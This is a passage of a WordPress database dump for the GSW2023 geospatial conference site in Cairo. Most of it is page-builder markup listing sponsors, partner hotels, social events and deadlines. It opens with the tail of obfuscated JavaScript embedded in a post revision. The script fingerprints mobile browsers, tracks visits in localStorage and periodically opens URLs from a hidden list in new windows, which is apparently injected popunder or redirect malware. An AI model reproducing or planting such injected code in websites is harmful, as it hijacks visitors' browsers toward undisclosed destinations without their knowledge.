os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 01:13:33','2023-07-10 01:13:33','',3066,'https://gsw2023.com/?p=4998',0,'revision','',0),
(4999,1,'2023-07-10 01:15:26','2023-07-10 01:15:26','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" 